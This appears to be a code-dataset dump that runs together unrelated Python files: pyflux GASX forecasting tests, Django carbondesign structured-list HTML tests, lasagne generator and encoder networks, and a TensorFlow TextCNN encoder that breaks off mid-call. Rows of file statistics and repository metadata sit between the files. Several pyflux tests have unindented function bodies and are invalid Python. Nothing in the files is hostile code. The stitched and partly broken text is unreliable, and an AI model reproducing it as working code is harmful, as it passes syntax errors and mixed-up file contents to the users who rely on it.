def test2_exponential_mh():
    """Two predictors, Metropolis-Hastings estimation: 5 latent variables, none NaN."""
    model = pf.GASX(formula="y ~ x1 + x2", data=data, ar=1, sc=1, family=pf.Exponential())
    model.fit('M-H', nsims=300)
    z_vals = np.array([lv.value for lv in model.latent_variables.z_list])
    assert(len(model.latent_variables.z_list) == 5)
    assert(not np.any(np.isnan(z_vals)))

def test2_exponential_laplace():
    """Two predictors, Laplace estimation: 5 latent variables, none NaN."""
    model = pf.GASX(formula="y ~ x1 + x2", data=data, ar=1, sc=1, family=pf.Exponential())
    model.fit('Laplace')
    z_vals = np.array([lv.value for lv in model.latent_variables.z_list])
    assert(len(model.latent_variables.z_list) == 5)
    assert(not np.any(np.isnan(z_vals)))

def test2_exponential_pml():
    """Two predictors, PML estimation: 5 latent variables, none NaN."""
    model = pf.GASX(formula="y ~ x1 + x2", data=data, ar=1, sc=1, family=pf.Exponential())
    model.fit('PML')
    z_vals = np.array([lv.value for lv in model.latent_variables.z_list])
    assert(len(model.latent_variables.z_list) == 5)
    assert(not np.any(np.isnan(z_vals)))
def test2_exponential_predict_length():
    """Two predictors: predict() returns a frame with exactly h rows."""
    model = pf.GASX(formula="y ~ x1 + x2", data=data, ar=1, sc=1, family=pf.Exponential())
    results = model.fit()
    results.summary()
    forecast = model.predict(h=5, oos_data=data_oos)
    assert(forecast.shape[0] == 5)

def test2_exponential_predict_is_length():
    """Two predictors: predict_is() returns a frame with exactly h rows."""
    model = pf.GASX(formula="y ~ x1 + x2", data=data, ar=1, sc=1, family=pf.Exponential())
    model.fit()
    in_sample = model.predict_is(h=5)
    assert(len(in_sample.index) == 5)

def test2_exponential_predict_nans():
    """Two predictors: out-of-sample predictions contain no NaNs."""
    model = pf.GASX(formula="y ~ x1 + x2", data=data, ar=1, sc=1, family=pf.Exponential())
    results = model.fit()
    results.summary()
    forecast = model.predict(h=5, oos_data=data_oos)
    assert(not np.any(np.isnan(forecast.values)))

def test2_exponential_predict_is_nans():
    """Two predictors: in-sample rolling predictions contain no NaNs."""
    model = pf.GASX(formula="y ~ x1 + x2", data=data, ar=1, sc=1, family=pf.Exponential())
    results = model.fit()
    results.summary()
    in_sample = model.predict_is(h=5)
    assert(not np.any(np.isnan(in_sample.values)))
def test2_predict_nonconstant():
    """
    Predictions over the horizon should not all be identical — a constant
    forecast usually means the predict routine failed to iterate forward.

    Bug fixed: the original body never fitted the model nor assigned
    `predictions`, so the assert raised NameError instead of testing anything.
    """
    model = pf.GASX(formula="y ~ x1 + x2", data=data, ar=1, sc=1, family=pf.Exponential())
    model.fit()  # must fit before forecasting
    predictions = model.predict(h=10, oos_data=data_oos)
    assert(not np.all(predictions.values==predictions.values[0]))
def test2_predict_is_nonconstant():
    """
    In-sample rolling predictions should not all be identical — a constant
    forecast usually means the predict function failed to iterate forward.

    Bug fixed: the original body never fitted the model nor assigned
    `predictions`, so the assert raised NameError instead of testing anything.
    """
    model = pf.GASX(formula="y ~ x1 + x2", data=data, ar=1, sc=1, family=pf.Exponential())
    model.fit()  # must fit before forecasting
    predictions = model.predict_is(h=10)
    assert(not np.all(predictions.values==predictions.values[0]))
def test2_predict_intervals():
"""
Tests prediction intervals are ordered correctly
"""
model = pf.GASX(formula="y ~ x1 + x2", data=data, ar=1, sc=1, family=pf.Exponential())
model.fit()
predictions = model.predict(h=10, oos_data=data_oos, intervals=True)
assert(np.all(predictions['99% Prediction Interval'].values > predictions['95% Prediction Interval'].values))
assert(np.all(predictions['95% Prediction Interval'].values > predictions['5% Prediction Interval'].values))
assert(np.all(predictions['5% Prediction Interval'].values > predictions['1% Prediction Interval'].values))
def test2_predict_is_intervals():
"""
Tests prediction intervals are ordered correctly
"""
model = pf.GASX(formula="y ~ x1 + x2", data=data, ar=1, sc=1, family=pf.Exponential())
model.fit()
predictions = model.predict_is(h=10, intervals=True)
assert(np.all(predictions['99% Prediction Interval'].values > predictions['95% Prediction Interval'].values))
assert(np.all(predictions['95% Prediction Interval'].values > predictions['5% Prediction Interval'].values))
assert(np.all(predictions['5% Prediction Interval'].values > predictions['1% Prediction Interval'].values))
def test2_predict_intervals_bbvi():
"""
Tests prediction intervals are ordered correctly
"""
model = pf.GASX(formula="y ~ x1 + x2", data=data, ar=1, sc=1, family=pf.Exponential())
x = model.fit('BBVI', iterations=100)
predictions = model.predict(h=10, oos_data=data_oos, intervals=True)
assert(np.all(predictions['99% Prediction Interval'].values > predictions['95% Prediction Interval'].values))
assert(np.all(predictions['95% Prediction Interval'].values > predictions['5% Prediction Interval'].values))
assert(np.all(predictions['5% Prediction Interval'].values > predictions['1% Prediction Interval'].values))
def test2_predict_is_intervals_bbvi():
"""
Tests prediction intervals are ordered correctly
"""
model = pf.GASX(formula="y ~ x1 + x2", data=data, ar=1, sc=1, family=pf.Exponential())
x = model.fit('BBVI', iterations=100)
predictions = model.predict_is(h=10, intervals=True)
assert(np.all(predictions['99% Prediction Interval'].values > predictions['95% Prediction Interval'].values))
assert(np.all(predictions['95% Prediction Interval'].values > predictions['5% Prediction Interval'].values))
assert(np.all(predictions['5% Prediction Interval'].values > predictions['1% Prediction Interval'].values))
def test2_predict_intervals_mh():
    """Check out-of-sample prediction interval ordering after a Metropolis-Hastings fit."""
    model = pf.GASX(formula="y ~ x1 + x2", data=data, ar=1, sc=1, family=pf.Exponential())
    model.fit('M-H', nsims=400)
    preds = model.predict(h=10, oos_data=data_oos, intervals=True)
    ordered = ['99% Prediction Interval', '95% Prediction Interval',
               '5% Prediction Interval', '1% Prediction Interval']
    for upper, lower in zip(ordered, ordered[1:]):
        assert np.all(preds[upper].values > preds[lower].values)
def test2_predict_is_intervals_mh():
    """Check in-sample prediction interval ordering after a Metropolis-Hastings fit."""
    model = pf.GASX(formula="y ~ x1 + x2", data=data, ar=1, sc=1, family=pf.Exponential())
    model.fit('M-H', nsims=400)
    preds = model.predict_is(h=10, intervals=True)
    ordered = ['99% Prediction Interval', '95% Prediction Interval',
               '5% Prediction Interval', '1% Prediction Interval']
    for upper, lower in zip(ordered, ordered[1:]):
        assert np.all(preds[upper].values > preds[lower].values)
def test2_sample_model():
    """Check that posterior predictive sampling returns the expected shape."""
    model = pf.GASX(formula="y ~ x1 + x2", data=data, ar=1, sc=1, family=pf.Exponential())
    model.fit('BBVI', iterations=100)
    draws = model.sample(nsims=100)
    # One row per simulation; one column per in-sample time point (len(data)-1
    # because the first observation is consumed by the ar=1 lag).
    assert draws.shape[0] == 100
    assert draws.shape[1] == len(data) - 1
def test2_ppc():
    """Check that the posterior predictive p-value is a valid probability."""
    model = pf.GASX(formula="y ~ x1 + x2", data=data, ar=1, sc=1, family=pf.Exponential())
    model.fit('BBVI', iterations=100)
    p_value = model.ppc()
    assert 0.0 <= p_value <= 1.0
| 42.22779 | 113 | 0.698835 | 2,795 | 18,538 | 4.56136 | 0.048658 | 0.101655 | 0.13554 | 0.056475 | 0.975135 | 0.973723 | 0.970743 | 0.966037 | 0.966037 | 0.947996 | 0 | 0.029054 | 0.147805 | 18,538 | 438 | 114 | 42.324201 | 0.777947 | 0.19247 | 0 | 0.765432 | 0 | 0 | 0.141671 | 0 | 0 | 0 | 0 | 0 | 0.320988 | 1 | 0.164609 | false | 0 | 0.012346 | 0 | 0.176955 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
692a1d1673c9e23e9a3c6c15e5f098a55c4c9838 | 9,240 | py | Python | carbondesign/tests/test_structured_list_html.py | dozymoe/django-carbondesign | 34aed0cfdccfa90fcb5bf2bbd347229815f1417b | [
"MIT"
] | null | null | null | carbondesign/tests/test_structured_list_html.py | dozymoe/django-carbondesign | 34aed0cfdccfa90fcb5bf2bbd347229815f1417b | [
"MIT"
] | null | null | null | carbondesign/tests/test_structured_list_html.py | dozymoe/django-carbondesign | 34aed0cfdccfa90fcb5bf2bbd347229815f1417b | [
"MIT"
] | null | null | null | # pylint:disable=missing-module-docstring,missing-class-docstring,missing-function-docstring
from django import forms
#-
from .base import compare_template, SimpleTestCase
class DummyForm(forms.Form):
    """Fixture form with a single optional ChoiceField.

    Used by the structured-list selection test, where each choice value is
    bound to one selectable row.
    """

    services = forms.ChoiceField(
        label="Number input label",
        required=False,
        choices=(
            ('apache spark', "apache spark"),
            ('Cloudant', "Cloudant"),
            ('block-storage', "block-storage"),
            ('open-whisk', "open-whisk"),
        ),
    )
class StructuredListHtmlTest(SimpleTestCase):
    """Render the carbondesign structured-list template tags and compare the
    output against hand-written expected Carbon Design System HTML."""

    # Show the full diff on assertion failure -- the compared HTML is long.
    maxDiff = None

    def test_default(self):
        """Plain (non-selectable) structured list: a header slot plus two rows."""
        template = """
{% load carbondesign %}
{% Sl %}
{% Slot 'header' %}
{% SlTh %}Column1{% endSlTh %}
{% SlTh %}Column2{% endSlTh %}
{% endSlot %}
{% SlTr %}
{% SlTd nowrap=True %}Row 1{% endSlTd %}
{% SlTd %}
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nunc dui magna,
finibus id tortor sed, aliquet bibendum augue.
{% endSlTd %}
{% endSlTr %}
{% SlTr %}
{% SlTd nowrap=True %}Row 2{% endSlTd %}
{% SlTd %}
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nunc dui magna,
finibus id tortor sed, aliquet bibendum augue. Aenean posuere sem vel
euismod dignissim. Nulla ut cursus dolor. Pellentesque vulputate nisl a
porttitor interdum.
{% endSlTd %}
{% endSlTr %}
{% endSl %}
"""
        expected = """
<section class="bx--structured-list">
<div class="bx--structured-list-thead">
<div class="bx--structured-list-row bx--structured-list-row--header-row">
<div class="bx--structured-list-th">Column1</div>
<div class="bx--structured-list-th">Column2</div>
</div>
</div>
<div class="bx--structured-list-tbody">
<div class="bx--structured-list-row">
<div class="bx--structured-list-td bx--structured-list-content--nowrap">
Row 1
</div>
<div class="bx--structured-list-td">
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nunc dui magna,
finibus id tortor sed, aliquet bibendum augue.
</div>
</div>
<div class="bx--structured-list-row">
<div class="bx--structured-list-td bx--structured-list-content--nowrap">
Row 2
</div>
<div class="bx--structured-list-td">
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nunc dui magna,
finibus id tortor sed, aliquet bibendum augue. Aenean posuere sem vel
euismod dignissim. Nulla ut cursus dolor. Pellentesque vulputate nisl a
porttitor interdum.
</div>
</div>
</div>
</section>
"""
        rendered = compare_template(template, expected)
        self.assertEqual(*rendered)

    def test_selection(self):
        """Selectable structured list bound to DummyForm.services: each row
        carries a radio input; the submitted value ('apache spark') renders
        its row selected and its input checked."""
        form = DummyForm(data={'services': 'apache spark'})
        context = {'form': form}
        template = """
{% load carbondesign %}
{% SlSelect form.services %}
{% Slot 'header' %}
{% SlTh %}Column1{% endSlTh %}
{% SlTh %}Column2{% endSlTh %}
{% SlTh %}{% endSlTh %}
{% endSlot %}
{% SlTr value="apache spark" %}
{% SlTd nowrap=True %}Row 1{% endSlTd %}
{% SlTd %}
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nunc dui magna,
finibus id tortor sed, aliquet bibendum augue.
{% endSlTd %}
{% endSlTr %}
{% SlTr value="Cloudant" %}
{% SlTd nowrap=True %}Row 2{% endSlTd %}
{% SlTd %}
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nunc dui magna,
finibus id tortor sed, aliquet bibendum augue. Aenean posuere sem vel
euismod dignissim. Nulla ut cursus dolor. Pellentesque vulputate nisl a
porttitor interdum.
{% endSlTd %}
{% endSlTr %}
{% SlTr value="block-storage" %}
{% SlTd nowrap=True %}Row 3{% endSlTd %}
{% SlTd %}
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nunc dui magna,
finibus id tortor sed, aliquet bibendum augue.
{% endSlTd %}
{% endSlTr %}
{% SlTr value="open-whisk" %}
{% SlTd nowrap=True %}Row 4{% endSlTd %}
{% SlTd %}
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nunc dui magna,
finibus id tortor sed, aliquet bibendum augue. Aenean posuere sem vel
euismod dignissim. Nulla ut cursus dolor. Pellentesque vulputate nisl a
porttitor interdum.
{% endSlTd %}
{% endSlTr %}
{% endSlSelect %}
"""
        expected = """
<section class="bx--structured-list bx--structured-list--selection"
data-structured-list>
<div class="bx--structured-list-thead">
<div class="bx--structured-list-row bx--structured-list-row--header-row">
<div class="bx--structured-list-th">Column1</div>
<div class="bx--structured-list-th">Column2</div>
<div class="bx--structured-list-th"></div>
</div>
</div>
<div class="bx--structured-list-tbody">
<label class="bx--structured-list-row bx--structured-list-row--selected" tabindex="0" aria-label="apache spark">
<div class="bx--structured-list-td bx--structured-list-content--nowrap">
Row 1
</div>
<div class="bx--structured-list-td">
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nunc dui magna,
finibus id tortor sed, aliquet bibendum augue.
</div>
<input tabindex="-1" class="bx--structured-list-input" value="apache spark"
type="radio" name="services" checked="" title="apache spark">
<div class="bx--structured-list-td">
<svg focusable="false" preserveAspectRatio="xMidYMid meet"
xmlns="http://www.w3.org/2000/svg" fill="currentColor"
class="bx--structured-list-svg" width="16" height="16"
viewBox="0 0 16 16" aria-hidden="true">
<path d="M8,1C4.1,1,1,4.1,1,8c0,3.9,3.1,7,7,7s7-3.1,7-7C15,4.1,11.9,1,8,1z M7,11L4.3,8.3l0.9-0.8L7,9.3l4-3.9l0.9,0.8L7,11z"></path>
<path d="M7,11L4.3,8.3l0.9-0.8L7,9.3l4-3.9l0.9,0.8L7,11z" data-icon-path="inner-path" opacity="0"></path>
</svg>
</div>
</label>
<label class="bx--structured-list-row" tabindex="0" aria-label="Cloudant">
<div class="bx--structured-list-td bx--structured-list-content--nowrap">
Row 2
</div>
<div class="bx--structured-list-td">
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nunc dui magna,
finibus id tortor sed, aliquet bibendum augue. Aenean posuere sem vel
euismod dignissim. Nulla ut cursus dolor. Pellentesque vulputate nisl a
porttitor interdum.
</div>
<input tabindex="-1" class="bx--structured-list-input" value="Cloudant"
type="radio" name="services" title="Cloudant">
<div class="bx--structured-list-td">
<svg focusable="false" preserveAspectRatio="xMidYMid meet"
xmlns="http://www.w3.org/2000/svg" fill="currentColor"
class="bx--structured-list-svg" width="16" height="16"
viewBox="0 0 16 16" aria-hidden="true">
<path d="M8,1C4.1,1,1,4.1,1,8c0,3.9,3.1,7,7,7s7-3.1,7-7C15,4.1,11.9,1,8,1z M7,11L4.3,8.3l0.9-0.8L7,9.3l4-3.9l0.9,0.8L7,11z"></path>
<path d="M7,11L4.3,8.3l0.9-0.8L7,9.3l4-3.9l0.9,0.8L7,11z" data-icon-path="inner-path" opacity="0"></path>
</svg>
</div>
</label>
<label class="bx--structured-list-row" tabindex="0" aria-label="block-storage">
<div class="bx--structured-list-td bx--structured-list-content--nowrap">
Row 3
</div>
<div class="bx--structured-list-td">
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nunc dui magna,
finibus id tortor sed, aliquet bibendum augue.
</div>
<input tabindex="-1" class="bx--structured-list-input" value="block-storage"
type="radio" name="services" title="block-storage">
<div class="bx--structured-list-td">
<svg focusable="false" preserveAspectRatio="xMidYMid meet"
xmlns="http://www.w3.org/2000/svg" fill="currentColor"
class="bx--structured-list-svg" width="16" height="16"
viewBox="0 0 16 16" aria-hidden="true">
<path d="M8,1C4.1,1,1,4.1,1,8c0,3.9,3.1,7,7,7s7-3.1,7-7C15,4.1,11.9,1,8,1z M7,11L4.3,8.3l0.9-0.8L7,9.3l4-3.9l0.9,0.8L7,11z"></path>
<path d="M7,11L4.3,8.3l0.9-0.8L7,9.3l4-3.9l0.9,0.8L7,11z" data-icon-path="inner-path" opacity="0"></path>
</svg>
</div>
</label>
<label class="bx--structured-list-row" tabindex="0" aria-label="open-whisk">
<div class="bx--structured-list-td bx--structured-list-content--nowrap">
Row 4
</div>
<div class="bx--structured-list-td">
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nunc dui magna,
finibus id tortor sed, aliquet bibendum augue. Aenean posuere sem vel
euismod dignissim. Nulla ut cursus dolor. Pellentesque vulputate nisl a
porttitor interdum.
</div>
<input tabindex="-1" class="bx--structured-list-input" value="open-whisk"
type="radio" name="services" title="open-whisk">
<div class="bx--structured-list-td">
<svg focusable="false" preserveAspectRatio="xMidYMid meet"
xmlns="http://www.w3.org/2000/svg" fill="currentColor"
class="bx--structured-list-svg" width="16" height="16"
viewBox="0 0 16 16" aria-hidden="true">
<path d="M8,1C4.1,1,1,4.1,1,8c0,3.9,3.1,7,7,7s7-3.1,7-7C15,4.1,11.9,1,8,1z M7,11L4.3,8.3l0.9-0.8L7,9.3l4-3.9l0.9,0.8L7,11z"></path>
<path d="M7,11L4.3,8.3l0.9-0.8L7,9.3l4-3.9l0.9,0.8L7,11z" data-icon-path="inner-path" opacity="0"></path>
</svg>
</div>
</label>
</div>
</section>
"""
        rendered = compare_template(template, expected, context)
        self.assertEqual(*rendered)
| 39.656652 | 137 | 0.651082 | 1,332 | 9,240 | 4.512763 | 0.121622 | 0.125769 | 0.141075 | 0.150225 | 0.859591 | 0.845949 | 0.835468 | 0.812178 | 0.786225 | 0.767426 | 0 | 0.05473 | 0.177381 | 9,240 | 232 | 138 | 39.827586 | 0.736087 | 0.009848 | 0 | 0.779817 | 0 | 0.105505 | 0.910999 | 0.309753 | 0 | 0 | 0 | 0 | 0.009174 | 1 | 0.009174 | false | 0 | 0.009174 | 0 | 0.036697 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
c6129bf1f105fe800b8e84fa5d5aa6e689fa659e | 2,694 | py | Python | lib/nn.py | tonywu95/eval_gen | 7625f402ab6f61762ad4da6377acdf00577aea62 | [
"MIT"
] | 137 | 2016-11-28T03:50:20.000Z | 2021-06-08T02:20:13.000Z | lib/nn.py | tonywu95/eval_gen | 7625f402ab6f61762ad4da6377acdf00577aea62 | [
"MIT"
] | 3 | 2017-08-31T00:55:35.000Z | 2018-04-22T18:55:10.000Z | lib/nn.py | tonywu95/eval_gen | 7625f402ab6f61762ad4da6377acdf00577aea62 | [
"MIT"
] | 23 | 2016-12-03T15:28:04.000Z | 2021-02-02T04:45:27.000Z | import theano
import lasagne
# Short aliases for the lasagne activation functions used by the network
# builders below.
tanh = lasagne.nonlinearities.tanh
sigmoid = lasagne.nonlinearities.sigmoid
linear = lasagne.nonlinearities.linear
# Default hidden-layer activation shared by the generator/encoder builders.
nonlin = tanh
def gan_gen_net10():
    """Build the GAN generator MLP: 10-d input -> 784-d sigmoid output."""
    net = lasagne.layers.InputLayer(shape=(None, 10))
    # Hidden stack: four dense layers with the shared default nonlinearity.
    for width in (64, 256, 256, 1024):
        net = lasagne.layers.DenseLayer(net, width, nonlinearity=nonlin)
    # Output layer: 784 units (28x28 pixels) squashed to [0, 1].
    return lasagne.layers.DenseLayer(net, 784, nonlinearity=sigmoid)
def vae_gen_net10():
    """Build the VAE decoder MLP: 10-d input -> 784*2-d sigmoid output."""
    net = lasagne.layers.InputLayer(shape=(None, 10))
    # Same hidden stack as the GAN generator.
    for width in (64, 256, 256, 1024):
        net = lasagne.layers.DenseLayer(net, width, nonlinearity=nonlin)
    # 784*2 outputs -- presumably two values per pixel; confirm against caller.
    return lasagne.layers.DenseLayer(net, 784*2, nonlinearity=sigmoid)
def enc_net10():
    """Build the encoder MLP: 784-d input -> 20-d linear output."""
    net = lasagne.layers.InputLayer(shape=(None, 784))
    for width in (256, 64):
        net = lasagne.layers.DenseLayer(net, width, nonlinearity=nonlin)
    # Linear head with 20 units (2x the 10-d latent; presumably mean+logvar).
    return lasagne.layers.DenseLayer(net, 20, nonlinearity=linear)
def gen_net50():
    """Build the 50-d generator MLP: 50-d input -> 784-d sigmoid output."""
    net = lasagne.layers.InputLayer(shape=(None, 50))
    # Three equal-width tanh hidden layers.
    for _ in range(3):
        net = lasagne.layers.DenseLayer(net, 1024, nonlinearity=tanh)
    return lasagne.layers.DenseLayer(net, 784, nonlinearity=sigmoid)
def enc_net50():
    """Build the 50-d encoder MLP: 784-d input -> 100-d linear output."""
    net = lasagne.layers.InputLayer(shape=(None, 784))
    for width in (1024, 256, 256, 64):
        net = lasagne.layers.DenseLayer(net, width, nonlinearity=nonlin)
    # Linear head with 100 units (2x the 50-d latent; presumably mean+logvar).
    return lasagne.layers.DenseLayer(net, 100, nonlinearity=linear)
| 38.485714 | 98 | 0.679659 | 265 | 2,694 | 6.883019 | 0.120755 | 0.207237 | 0.296053 | 0.361842 | 0.869518 | 0.82182 | 0.82182 | 0.777412 | 0.777412 | 0.777412 | 0 | 0.043145 | 0.225687 | 2,694 | 69 | 99 | 39.043478 | 0.831256 | 0 | 0 | 0.721311 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.081967 | false | 0 | 0.032787 | 0 | 0.196721 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
c61f0205a5e1699171579493fc16e7ce05e6d108 | 28,431 | py | Python | t2t_bert/model/textcnn/textcnn.py | yyht/bert | 480c909e0835a455606e829310ff949c9dd23549 | [
"Apache-2.0"
] | 34 | 2018-12-19T01:00:57.000Z | 2021-03-26T09:36:37.000Z | t2t_bert/model/textcnn/textcnn.py | yyht/bert | 480c909e0835a455606e829310ff949c9dd23549 | [
"Apache-2.0"
] | 11 | 2018-12-25T03:37:59.000Z | 2021-08-25T14:43:58.000Z | t2t_bert/model/textcnn/textcnn.py | yyht/bert | 480c909e0835a455606e829310ff949c9dd23549 | [
"Apache-2.0"
] | 9 | 2018-12-27T08:00:44.000Z | 2020-06-08T03:05:14.000Z | import tensorflow as tf
import numpy as np
from utils.bert import bert_modules
from utils.textcnn import textcnn_utils, dgcnn_utils, light_conv_utils
from utils.bimpm import match_utils
from utils.embed import integration_func
from model.base_classify import base_model
from utils.qanet import qanet_layers
from utils.qanet.qanet_layers import highway
from utils.dsmm.tf_common.nn_module import encode, attend, mlp_layer
from utils.bert import bert_utils
from utils.esim import esim_utils
from utils.textcnn import dynamic_light_cnn_utils
class TextCNN(base_model.BaseModel):
def __init__(self, config):
    """Store *config* and delegate to BaseModel, which builds the shared
    pieces (embedding table, scope, etc.) used by build_encoder below."""
    super(TextCNN, self).__init__(config)
def build_encoder(self, input_ids, input_char_ids, is_training, **kargs):
    """Build the convolutional sequence encoder over the word embeddings.

    Applies an optional highway projection to ``self.word_emb``, zeroes out
    padding positions, then dispatches on ``kargs['cnn_type']`` to one of
    several CNN variants (textcnn, gated/resnet CNN, (bi-)DGCNN, light-conv
    DGCNN).  Side effects -- sets:
      self.sent_repres: masked (possibly highway-projected) embeddings.
      self.sequence_output: per-token encoder output (None for the plain
        textcnn / multilayer_textcnn branches).
      self.output: pooled sentence representation.

    Args:
      input_ids: int tensor of token ids; the id ``kargs['[PAD]']``
        (default 0) marks padding.
      input_char_ids: not used by this method (presumably reserved for
        char-level models -- confirm against callers).
      is_training: python bool; enables dropout and training-mode conv ops.
      **kargs: must contain 'reuse'; optional 'cnn_type', '[PAD]'.
    """
    reuse = kargs["reuse"]
    if is_training:
        dropout_rate = self.config.dropout_rate
    else:
        dropout_rate = 0.0
    # dropout_rate = tf.cond(is_training,
    #           lambda:self.config.dropout_rate,
    #           lambda:0.0)

    # keep_prob=1: dropout is effectively disabled on the raw embeddings.
    word_emb_dropout = tf.nn.dropout(self.word_emb, 1)

    # Optional highway network on top of the embeddings.
    with tf.variable_scope(self.config.scope+"_input_highway", reuse=reuse):
        input_dim = word_emb_dropout.get_shape()[-1]
        if self.config.get("highway", "dense_highway") == "dense_highway":
            tf.logging.info("***** dense highway *****")
            sent_repres = match_utils.multi_highway_layer(word_emb_dropout, input_dim, self.config.highway_layer_num)
        elif self.config.get("highway", "dense_highway") == "conv_highway":
            tf.logging.info("***** conv highway *****")
            sent_repres = highway(word_emb_dropout,
                            size = self.config.num_filters,
                            scope = "highway",
                            dropout = dropout_rate,
                            reuse = reuse)
        else:
            sent_repres = word_emb_dropout

    # Padding mask: 1 for real tokens, 0 for [PAD]; zero out padded embeddings.
    input_mask = tf.cast(tf.not_equal(input_ids, kargs.get('[PAD]', 0)), tf.int32)
    input_len = tf.reduce_sum(tf.cast(input_mask, tf.int32), -1)
    mask = tf.expand_dims(input_mask, -1)
    sent_repres *= tf.cast(mask, tf.float32)
    self.sent_repres = sent_repres

    with tf.variable_scope(self.config.scope+"_encoder", reuse=reuse):
        # --- plain TextCNN: conv + pool straight to a sentence vector ---
        if kargs.get("cnn_type", 'textcnn') == 'textcnn':
            self.output = textcnn_utils.text_cnn_v1(sent_repres,
                    self.config.get("filter_size", [1,3,5]),
                    "textcnn",
                    sent_repres.get_shape()[-1],
                    self.config.num_filters,
                    max_pool_size=self.config.max_pool_size,
                    input_mask=input_mask)
            self.sequence_output = None
            tf.logging.info("***** normal cnn *****")
        # --- stacked TextCNN layers ---
        elif kargs.get("cnn_type", 'textcnn') == 'multilayer_textcnn':
            self.output = textcnn_utils.cnn_multiple_layers(sent_repres,
                    self.config.get("filter_size", [1,3,5]),
                    "textcnn",
                    sent_repres.get_shape()[-1],
                    self.config.num_filters,
                    max_pool_size=2,
                    input_mask=input_mask,
                    is_training_flag=is_training)
            self.sequence_output = None
            tf.logging.info("***** multi-layer cnn *****")
        # --- gated CNN via the generic dsmm encode() helper ---
        elif kargs.get("cnn_type", 'textcnn') == 'gated_cnn':
            input_shape = bert_utils.get_shape_list(sent_repres, expected_rank=3)
            hidden_size = self.config['cnn_num_filters']
            input_width = input_shape[-1]
            # Project embeddings to the filter width so residuals line up.
            if input_width != hidden_size and self.config['cnn_residual']:
                sent_repres = tf.layers.dense(
                    sent_repres,
                    hidden_size,
                    use_bias=None,
                    activation=None,
                    kernel_initializer=tf.truncated_normal_initializer(stddev=0.01))
                tf.logging.info("==apply embedding linear projection==")
            self.sequence_output = encode(sent_repres,
                        method=self.config["encode_method"],
                        input_dim=input_dim,
                        params=self.config,
                        sequence_length=input_len,
                        mask_zero=self.config["embedding_mask_zero"],
                        scope_name=self.scope + "enc_seq",
                        reuse=tf.AUTO_REUSE,
                        training=is_training)
            print(self.sequence_output.get_shape(), '=====sequence_output shape=====')
            # Pool the per-token outputs into a sentence vector.
            pooled_output = []
            for pooling_method in self.config['pooling_method']:
                if pooling_method == 'avg':
                    seq_mask = tf.cast(mask, tf.float32)
                    avg_repres = tf.reduce_sum(self.sequence_output*seq_mask, axis=1)/(1e-10+tf.reduce_sum(seq_mask, axis=1))
                    pooled_output.append(avg_repres)
                    tf.logging.info("***** avg pooling *****")
                elif pooling_method == 'max':
                    seq_mask = tf.cast(mask, tf.float32)
                    max_avg = tf.reduce_max(qanet_layers.mask_logits(self.sequence_output, seq_mask), axis=1)
                    pooled_output.append(max_avg)
                    tf.logging.info("***** max pooling *****")
            self.output = tf.concat(pooled_output, axis=-1)
            tf.logging.info("***** seq-encoder *****")
        # --- multi-layer gated CNN ---
        elif kargs.get("cnn_type", 'textcnn') == 'multilayer_gatedcnn':
            input_shape = bert_utils.get_shape_list(sent_repres, expected_rank=3)
            hidden_size = self.config['cnn_num_filters']
            input_width = input_shape[-1]
            if input_width != hidden_size and self.config['cnn_residual']:
                sent_repres = tf.layers.dense(
                    sent_repres,
                    hidden_size,
                    use_bias=None,
                    activation=None,
                    kernel_initializer=tf.truncated_normal_initializer(stddev=0.01))
                tf.logging.info("==apply embedding linear projection==")
            self.sequence_output = textcnn_utils.gated_cnn(sent_repres,
                            input_mask,
                            num_layers=self.config['cnn_num_layers'],
                            num_filters=self.config['cnn_num_filters'],
                            filter_sizes=self.config['cnn_filter_sizes'],
                            bn=self.config['bn'],
                            training=is_training,
                            timedistributed=False,
                            scope_name="textcnn",
                            reuse=False,
                            activation=tf.nn.relu,
                            gated_conv=self.config['cnn_gated_conv'],
                            residual=self.config['cnn_residual'])
            print(self.sequence_output.get_shape(), '=====sequence_output shape=====')
            pooled_output = []
            for pooling_method in self.config['pooling_method']:
                if pooling_method == 'avg':
                    seq_mask = tf.cast(mask, tf.float32)
                    avg_repres = tf.reduce_sum(self.sequence_output*seq_mask, axis=1)/(1e-10+tf.reduce_sum(seq_mask, axis=1))
                    pooled_output.append(avg_repres)
                    tf.logging.info("***** avg pooling *****")
                elif pooling_method == 'max':
                    seq_mask = tf.cast(mask, tf.float32)
                    max_avg = tf.reduce_max(qanet_layers.mask_logits(self.sequence_output, seq_mask), axis=1)
                    pooled_output.append(max_avg)
                    tf.logging.info("***** max pooling *****")
            self.output = tf.concat(pooled_output, axis=-1)
            tf.logging.info("***** seq-encoder *****")
        # --- multi-layer residual CNN ---
        elif kargs.get("cnn_type", 'textcnn') == 'multilayer_resnetcnn':
            input_shape = bert_utils.get_shape_list(sent_repres, expected_rank=3)
            hidden_size = self.config['cnn_num_filters']
            input_width = input_shape[-1]
            if input_width != hidden_size and self.config['cnn_residual']:
                sent_repres = tf.layers.dense(
                    sent_repres,
                    hidden_size,
